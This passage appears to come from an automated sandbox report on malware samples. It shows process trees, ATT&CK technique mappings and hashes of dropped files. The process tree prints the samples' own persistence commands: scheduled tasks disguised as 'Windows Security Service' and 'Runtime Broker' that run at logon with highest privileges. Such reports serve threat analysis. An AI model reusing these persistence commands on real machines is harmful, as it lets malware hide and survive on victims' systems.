        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5364
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6916
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bk0XKrCEmKeT.bat" "
        16⤵
        
        PID:5272
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:7140
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5268
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6924
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QFtN4e58G0Po.bat" "
        18⤵
        
        PID:7124
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5080
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1396
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kOA3CkKSW1dx.bat" "
        20⤵
        
        PID:7340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:7380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7400
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        21⤵
        Executes dropped EXE
        
        PID:7692

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
1⤵
- Executes dropped EXE
PID:4620
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1720
- C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
  "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SendNotifyMessage
  PID:4544
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1860

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
1⤵
- Executes dropped EXE
PID:4532

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
"C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr" /S
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4044

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:7508

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:7600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aa.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\88e71dd0-d476-4cac-96e7-49f0482e8c21.tmp

Filesize
5KB

MD5
338104b7c041fca8321ff95c9ed3423f

SHA1
006a0cd03acf5eb7012e43f799360563d2295d0a

SHA256
bc0ea3933f65cfbb712d5932a8f81bd1fa9416b1883e9de49653c0fe6260acc8

SHA512
fec6c2726f1a1b5bec77d1b363c98d226299853a0ab44955f1a54da845121f16e955e4eefd8dad2cff88433739af13ba14c6f6660570be0e74c082883c1d5f35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
2cc3b6ca6b412d331157ecd0c6536e4c

SHA1
26a6fde2131559c5f5d50f023b877a33605c9709

SHA256
03cceee50d8be416bf95f2a32776720871a15e9822f8d0f64059a6f772c2f765

SHA512
8e8326d6e9a992f64b547805b43cc75a58e25b26be9ce2d1bf5a07f20f86b76b24158299651bae06ab511ea3db56b668521c1d11de458056a6ec140d8dc518a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
565B

MD5
fad49623353248a55a6e3e1b94719906

SHA1
07761c05bbfa074ebc47740c8b94dd1daeec3988

SHA256
03a6496414bc9a89b4ed2923687b14877e714085e62e5daa922eb2fece4b552f

SHA512
65410899b5ed5803d6ca94d336442ec765c10a1a27eaf15f141954f508ce62e13dc76f7a33741fcab72fe8e557f9c9477ddfe7672fa2198110921360622d1400

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6b7bd3eed6ea3742e758393d66e573f7

SHA1
2167755c23675e49db41584000ad89b728e1e33a

SHA256
603caa47a2321b5803609fe277cfe34dc6698191a3ab837d1eb7e3ef4be48999

SHA512
2c41338f5b552591d9f1dd616dc2615d8f0fb10b84a455ee677969d6d2c6c85b00006749c45f6665f4df7a0e152537976a0336a04d7ab0e30597c846d99993c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c67042c06cd56a63f7666f44e88f7db0

SHA1
cd3647a29d4b7e9bb8bbe3fcd4bf741e6da80561

SHA256
b39b5d7641eed9226976fbf88a8179f9d8080eab4a8a903bc242f7ed5e4c0fee

SHA512
64965e6a063ce6c8f8de79213cb27a69d6efadeea890bd4c657eece1dbcd00a3a32f831694d8458d4966129f4ea16f6922d8f0e09362bcc240c3a2294bc36aff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
3dd1ae0a543e74b03bdd34fe5b9dc3f2

SHA1
78ad5da9d3cb913bed812d8272430dab05ecaf52

SHA256
78b108ea6d2f5e886e96768887788d77729d65c711d7dea7110c67bdec395265

SHA512
8d94eded70c477bd12b367c09e8bdfe68717b55b411b0e874578ae370b533d73f37e41ffe87cb735e6241a5e2e11b4955594af5f9c6b832bf224ecc2e3151eb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
24d3152aa31c8d604723b6d7a0d8a717

SHA1
6f5482137c6e90a530a329eef6454568508942e0

SHA256
a1e560a152fb97bad423f6097173b8ba7873236f41a14f94c2f3ccac5d5e4efe

SHA512
ab71a4b2e292702e0889bd3996b60b1b28a61fcd905effdb36b5049608a62ae7ba2337a63a623e4583306b585d59799b7be2bb0ee8bffada70df8cfbf02c0bc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fc079597ed0f6139a9ab5553504d2a3c

SHA1
1ba62137477d2e3a4f185890a28699a2e401bac6

SHA256
646c56901ed91d233da07426b68d6fd568bb6d07143d569c35861dc39c923e59

SHA512
48122eb7b654baeaa1586ed966b45a8ee05601c0452f05c54dccd80fbe28a0244e9b186be18aead48779f28c041173e7126202c7568df62b4af6bde3b0b0b4de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2b37f65608d131891ebcf5501a8b76f9

SHA1
1e7a5bff7f19c361b4c3dc8b08b650af49197fcb

SHA256
be182c5cf46c7123db0d8864e86539a2f14b168df8bf4d5c6c2b4cd362d56456

SHA512
e0b319feba553ff0d2cfb6b639e755e09fc94272cde978d1c2d73050b24572192a3efe65b7d82386af26c2c2057450cd38a8c310e0b747247123b26f412b9352

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
ede459d5a4b51bcdd4086ebd796e54ac

SHA1
d99025c07af9587c9962f6ff27ac4b73f79ca997

SHA256
865832a889e1131ebd5af36b2972fc56347c75f9147c6539b2ce534bb561206d

SHA512
9294cfcb95ae51aeed55a8318de83e4588ca7281f3b768b345ab6a0bfecc3c2bfe6ead90aadef2dcc8360c56a2ab88a159eadd883bc0875ec8cd9326e3142486

Download Submit
C:\Users\Admin\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4272.xml

Filesize
805B

MD5
f9b39fce68ed334759431ef79b9f8442

SHA1
90ef505d53f795e63beb4e6da1365ac3662a3198

SHA256
1fdb640e0a7652d71237dec9e0c3ae69801d054a3a84bca20e433c841770e23e

SHA512
dc6e78635e122c77e898f7438dccec7c6899d460546e1b571a3d518508ede50ccd64e1f793df872d09eeac04b4b422dc174192bd07362cacb0f49388cb098098

Download Submit
C:\Users\Admin\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4272.xml

Filesize
1KB

MD5
c8449df44fa6dae43291bc207270307c

SHA1
64b23ce7dbc48509755ab442f26afd8068ebf622

SHA256
efdbaf24dad28d04f7207177b58005d0f2fbc1f57d39bc1a7430ccb1406c718e

SHA512
91e3f3b36dcba69f076a2580649573e9974528a6d05b1ddb4f1090e16e3de876f313ba964931e064045f26d182fef5391afbe35e1d12dc561da92b2088d0a98d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\n3v4jv4q.tmp

Filesize
793B

MD5
0867380d943287d28398df9e0d66d28a

SHA1
b6abb83142c089666c446a5e37ce143e97b59b1d

SHA256
f91eaed2ba875fbdc1c58de33a98b6f8a7f59ddf97052713fd05a9b74923000e

SHA512
dad5feb9f8ca34dd43ae47edd90984a5bdee90fc8a44033d0e6b94c03dfd80282bb2d5d888b81facdf3acb944727419589f01132b44e46e594d42e261bd5cba3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\activity-stream.discovery_stream.json

Filesize
24KB

MD5
da89f24b5deef152799b1a29e8033508

SHA1
426e881784d975ff958100d4c01bce48ce7a7391

SHA256
d6438e6a2521e43eb4db57f69490fe092f356655b96b1a46552b0f5a10cfc6d1

SHA512
8f39c13c3cd35c8e29772f1068a59ffa6c44046d0bcf2421af87f97ce583e29b0cb06e6cd0787ff0b78405b4b7faa71ffc6de1c59f91b7723fbfb56ceee0bec0

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\cache2\entries\53E4DBEAC22D519407D7539082E6EEB5E2C5C8B4

Filesize
38KB

MD5
28c45d0fa98d9ec60d520ca3ccac591e

SHA1
dd57049308b2af9300c5bfbe1f28f50341ae6089

SHA256
851ef8d47c2958466e1d518b1e0a6ce9d71c07ef5871686927918ce4d5c9b079

SHA512
097183a98bd3e4600a745700699e1a9ff7ded7897e6fe3dc9d1079aa98bbdac2faf426244d1127d77b4d844a4babb8f6e76c8058f145ca118e4fba8638a5daf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0D3FD782\.text

Filesize
2.7MB

MD5
f9597f1d3d939335bd87c87d8752369b

SHA1
bd1f0c684d6a11786fb78ef9267c1b5b06196f9f

SHA256
544fc226fbb5a1c43772c41c55da18dcbc3f9f3e7e78679c377783264e86c14c

SHA512
6caf78d7f5e6dc38bd90b8601c85ea3a30c659ca6e14e5226519bc83b844ce033e3277340cda7ccf430da520363bf71f11a4c4495179c12796c66c5a63c6b90e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvj32u1i.t4g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5D7F.tmp.bat

Filesize
152B

MD5
d13257f2d7dcd27e5bff47e76c9e6b4b

SHA1
30e76af642202245d8b28f8dfe79502761094603

SHA256
5c5060a4e218516395357648d304f07bb29b630a93989fcd48ac5cc0daa887ed

SHA512
2465aaa32671b29c9d930234ec61fc804b2a1c035fc74459e8da7cbbd166ada43823f5c1d7a4bec22edbe81775d84d5416c6ef3b09c3a4f3837cd6bb8d119777

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6E38.tmp.bat

Filesize
162B

MD5
09990e02d903ffea19565089b040e964

SHA1
cc1041180674b2f9db22893075a6d5100265eaf3

SHA256
f7b6420638551d244aa18ff87c67e3228c5b2db97b7b34a02f4a91762c8e2b25

SHA512
5674c6af7b4e1497823d34477ca943c8cacbf1def87f948c2037a8441ae48c544e8ef7e5f384393bef280b121a5971282fc0b39e4b8d69a5154caa7b114ec591

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp725E.tmp.bat

Filesize
160B

MD5
fe607ecfa7ba34a3c34f7623f1f461ca

SHA1
049cd57c4c7dc51cb9816663a7aecafe88c6be52

SHA256
e0b312af1d7039b160fb720478fe90452888ac68b8fd0555ea10f4385734116a

SHA512
8d936a36e2c1bbf9d170c34abfe34023092d2242e1d1d55b49480b4189fd16d270c55c471dbdb97cf2c05cad36fa274d1f8ed656c177c72a4838e362b80adbd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7FC1.tmp.bat

Filesize
148B

MD5
48346d9df9f09822b73904ac51a4428d

SHA1
3ea9bfb206e95eea76e24b38668f44d13535432e

SHA256
a295bfcf67ac70942f81c72b3bdac03e3d232d0057eb553fe58ebf32ac8b98a1

SHA512
ad12f05d48c67ba09b5c9eef24d4659bf5bd828e30d18db959186fb53d7c76823ea2072310f06d51b098f05e15370600dc4d3d8c3fdc66df5d28f7351c86c2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\543SYZL555LE7MH5UGES.temp

Filesize
19KB

MD5
4f84a4d91aaff5ff9526e1aa967bd9a6

SHA1
3d79f6c770671d686de1146c821f0fef6b493500

SHA256
ce97c9b19a2038955c8ee17f84923f5f2c3cf5a1958c1beb6d9c0e7bb4cf220c

SHA512
6725bd485edf575506145d01ffa03cb6e126c8604e0172ab39fbd04ef71f999ad40259d60831fc9309fc1c881ea7e503924e175a0c8160f5048df1055616f4fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
ffee865738e14844ba1dccd553408cd1

SHA1
76c0991b82ffaf87bbcaf3b199fef173ab9e0edb

SHA256
613ecc1ef724ca66be23d1f4f9059b6fa64257f6c7e59d3769a9e5b60740e27e

SHA512
bea9f5fa02baed65d4803327bb73f11d2865ba0e1b20f2ecc82b6d0023abaf12f7dacc4259f5891cd816577c00fe288e917ce5fd94b7a87f0e8e8efc0267efdb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
6a77fbcd5509b6904c958b62cc93deb3

SHA1
7fb66c31cc2fde4c0f2246ec06ef99fa59d9bd06

SHA256
3331cf2dccd3ed48de54fe5d2ddf34b9b3b57cadeed8396d007f5ffe52122902

SHA512
67c930d50d578e6a9819d8962987a29b68b23e6ccff860542741ce6933854e03c4b2148ff49a595ba7b18f54348104d9b6ea56f9aa930fe8dd58c96228bd7326

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin

Filesize
6KB

MD5
6cb3756820e602329380ff07212bcd94

SHA1
b0c0809b0b7d06bd9a716122fbc7c98565a9e99f

SHA256
8505f3d5b1f6dd52a172df39edad31142d2a05c908a3f2aae39459163d964d50

SHA512
9af8727244f23cce70760f2bd5a2bf637888f089979f91dbefc20d22288652923185121e9f717fabfb3b5ff87a30a4d1701bdef41a9495940201492c9fb5c89f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\AlternateServices.bin

Filesize
10KB

MD5
f8fa7e13f16d136808fe5d35c22beb26

SHA1
ed6c0d488c836b3e2a63664b9fd87b174096861c

SHA256
35cf77d10f8deeff5cbf34ab6acf1de734f74870bd1c1c0f2d62f72423da5903

SHA512
d0a12e2d9c02957cf042b494e4528434e83af7fe77c67dc49dc0547f07c882c5a98d4085fb7809ef314b629ca6034590b72b536f9a57cf9d6324a1ccfab37b34

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
21KB

MD5
7bd3d143a27b641369dac3368f169f1a

SHA1
30f8f598f69312f81db5c645c2d3ec3b535f0f43

SHA256
ed577cb3af12da0b13ae47edefa525145654d9f5fd6dd4ddf871d496bd494df6

SHA512
11b54e05684a5139ddc910450046a52ff9890c3158cf550be34a95d4f24f0ae7a02d542d2e85c2946dc85666686b960ae01f9aca0fc1a6df04a8718a4e419452

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
9201a36d7a49ae35bb5638633c758f4c

SHA1
94a13f12f3e231e728dfc3bd53ab230270450e99

SHA256
fe659216533a470b284985ae321acea1ac364fe3c6b44ca1e2bd6e61f16eb460

SHA512
39a21e15cb896e7d9c8259b3c3bf5ca46eb4e07efe21e0b3f20556059290a82de85c7519ce3f97d12e4ded8f778eb1e7c389d7d3c278207744e679277fc0c8d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
22KB

MD5
05b2ee5dbcac3b27f6ec9d067f5826cd

SHA1
3531bb1c7152b90b0c15b44b2dd231ffb4bd3feb

SHA256
272d8639342911d72d298a98b6c5c37c6c3c3518ad391999edba6e6eb9cd2fe3

SHA512
fd844afe1db9373d8bc5f62a937724f98047602b8f420ec12f7d9a7bbbba425c1e78cd6d86742f0c030941a30871dc9695bf5859d881d9c3410cd6e95db46ea1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\db\data.safe.tmp

Filesize
36KB

MD5
9cb1e1d4b9c7165cff1fffc300788d2c

SHA1
7998d8a419b08dbe98daf3f2119ab6445e3e27a8

SHA256
c484580877abeeb8560f60b2f21e8491ae0cdf5f1b81e02b128b36e5a357f03c

SHA512
c5e98e39b99d6092d5a2a33d276ce02979b5662753aee237810a116c0a2cf3c8d6d9cdfd46cd8d6f37cfee5d92b118701a19ecaedd95cbfb27f197b8dd42482a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\3469b42d-cfba-49e8-a540-f7b0c479617a

Filesize
659B

MD5
cbe8aba001b34ca4d45e42cf08efe399

SHA1
acb49cda3fbe402e22655aaf0eca95994a20f6c5

SHA256
6567d94d7170c8bb2f069a742d6d2cf4ceea9de81303bfe3f8857c35a9a690af

SHA512
9009a62b06c714590c3c71a975d869100f703d35b7f323603775ce42de1e0170786a4fb64eb3dc9715199b4ce4b7abfd56577ba65ffd1188220865f23c10aa37

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\datareporting\glean\pending_pings\d9417780-0719-4e81-aa71-e1e6115f4db4

Filesize
982B

MD5
ddbab06714b107e9e2cd191144c67c54

SHA1
8d095add1aff3e48dba7cd1be282bf8adf8ddf73

SHA256
f4a5ca12f582409867e94e32878f29ce4d7710f70c3f083088aa8848acc6fa6d

SHA512
b3a5e33d99d5876d1edc4828d7e0012b562c683a99f7531076e941b884fa0577c0c4017feb4912d6c8313cfd9bf8152f11980a7df090dec5f7796ad5bd5f7558

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\prefs-1.js

Filesize
11KB

MD5
b7e205335427cc6d1ab74b739680bc8e

SHA1
a17d487764a0a7de23a2af36902fb88273e91d4f

SHA256
443c9df9305c48b3e4e1c9098fdf0840078088746e59af8ea856aef95dabaa4e

SHA512
